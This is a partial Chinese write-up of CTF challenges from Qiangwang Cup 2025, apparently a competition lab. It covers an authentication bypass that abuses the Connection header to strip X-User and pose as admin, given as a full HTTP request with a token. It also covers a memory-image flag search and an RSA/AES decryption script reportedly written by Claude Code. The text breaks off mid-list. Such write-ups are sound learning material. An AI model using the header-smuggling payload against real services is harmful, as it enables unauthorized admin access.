强网杯 2025-Writeup(部分)
SecretVault 审计源代码,发现对 X-User 请求头的提取有逻辑问题,只需要传空头即可伪造成 admin 身份,获取 flag: Payload: GET /dashboard HTTP/1.1 Host: 47.93.103.116:39040 Connection: close,X-User Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJBdXRob3JpemVyIiwic3ViIjoiMSIsImV4cCI6MTc2MDc1ODkwNywibmJmIjoxNzYwNzU1MzA3LCJpYXQiOjE3NjA3NTUzMDcsInVpZCI6IjEifQ.SVosiGo7VXuKuRN-YkQO9EWUt_WAmG7jMAbCRPHfHMs Personal Vault 使用 Lovelymem 工具加载镜像后,直接搜索 flag{ 字符串即可获得 flag: Check-little Claude Code 自行审计生成解密脚本: from Crypto.Util.number import * from Crypto.Util.Padding import unpad from Crypto.Cipher import AES import gmpy2 N = 18795243691459931102679430418438577487182868999316355192329142792373332586982081116157618183340526639820832594356060100434223256500692328397325525717520080923556460823312550686675855168462443732972471029248411895298194999914208659844399140111591879226279321744653193556611846787451047972910648795242491084639500678558330667893360111323258122486680221135246164012614985963764584815966847653119900209852482555918436454431153882157632072409074334094233788430465032930223125694295658614266389920401471772802803071627375280742728932143483927710162457745102593163282789292008750587642545379046283071314559771249725541879213 c = 10533300439600777643268954021939765793377776034841545127500272060105769355397400380934565940944293911825384343828681859639313880125620499839918040578655561456321389174383085564588456624238888480505180939435564595727140532113029361282409382333574306251485795629774577583957179093609859781367901165327940565735323086825447814974110726030148323680609961403138324646232852291416574755593047121480956947869087939071823527722768175903469966103381291413103667682997447846635505884329254225027757330301667560501132286709888787328511645949099996122044170859558132933579900575094757359623257652088436229324185557055090878651740 iv = b'\x91\x16\x04\xb9\xf0RJ\xdd\xf7}\x8cW\xe7n\x81\x8d' ciphertext = bytes.fromhex('bf87027bc63e69d3096365703a6d47b559e0364b1605092b6473ecde6babeff2') p = gmpy2.gcd(c, N) if 1 < p < N: q = N // p e = 3 phi = (p - 1) * (q - 1) d = pow(e, -1, phi) key = pow(c, d, N) aes_key = long_to_bytes(key)[:16] try: cipher = AES.new(key=aes_key, iv=iv, mode=AES.MODE_CBC) plaintext = cipher.decrypt(ciphertext) flag = unpad(plaintext, 16).decode() print(flag) except Exception as e: print(f"[-] AES 解密失败: {e}") The_Interrogation_Room Claude Code 自行审计生成解题脚本: ...